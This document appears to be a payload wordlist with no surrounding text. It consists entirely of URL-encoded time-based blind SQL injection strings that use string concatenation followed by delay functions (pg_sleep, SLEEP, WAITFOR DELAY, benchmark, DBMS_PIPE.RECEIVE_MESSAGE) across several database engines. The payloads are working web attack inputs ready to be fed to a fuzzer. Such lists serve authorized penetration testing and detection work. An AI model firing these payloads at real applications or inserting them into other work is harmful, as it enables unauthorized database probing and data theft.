%22%7C%7CSELECT%20pg_sleep%285%29--%20-
%27%7C%7CUNION%20SELECT%20pg_sleep%285%29--%20-
%22%7C%7CUNION%20SELECT%20pg_sleep%285%29--%20-
%27%7C%7CSLEEP%285%29--%20-
%22%7C%7CSLEEP%285%29--%20-
%27%7C%7CSELECT%20SLEEP%285%29--%20-
%22%7C%7CSELECT%20SLEEP%285%29--%20-
%27%7C%7CUNION%20SELECT%20SLEEP%285%29--%20-
%22%7C%7CUNION%20SELECT%20SLEEP%285%29--%20-
%27%7C%7CWAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%22%7C%7CWAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%27%7C%7CWAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%22%7C%7CWAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%27%7C%7Cbenchmark%2850000000%2CMD5%281%29%29--%20-
%22%7C%7Cbenchmark%2850000000%2CMD5%281%29%29--%20-
%27%7C%7CDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%22%7C%7CDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%27%7C%7Cpg_sleep%285%29%23
%22%7C%7Cpg_sleep%285%29%23
%27%7C%7CSELECT%20pg_sleep%285%29%23
%22%7C%7CSELECT%20pg_sleep%285%29%23
%27%7C%7CUNION%20SELECT%20pg_sleep%285%29%23
%22%7C%7CUNION%20SELECT%20pg_sleep%285%29%23
%27%7C%7CSLEEP%285%29%23
%22%7C%7CSLEEP%285%29%23
%27%7C%7CSELECT%20SLEEP%285%29%23
%22%7C%7CSELECT%20SLEEP%285%29%23
%27%7C%7CUNION%20SELECT%20SLEEP%285%29%23
%22%7C%7CUNION%20SELECT%20SLEEP%285%29%23
%27%7C%7CWAITFOR%20DELAY%20%270%3A0%3A5%27%23
%22%7C%7CWAITFOR%20DELAY%20%270%3A0%3A5%27%23
%27%7C%7CWAITFOR%20DELAY%20%220%3A0%3A5%22%23
%22%7C%7CWAITFOR%20DELAY%20%220%3A0%3A5%22%23
%27%7C%7Cbenchmark%2850000000%2CMD5%281%29%29%23
%22%7C%7Cbenchmark%2850000000%2CMD5%281%29%29%23
%27%7C%7CDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%22%7C%7CDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
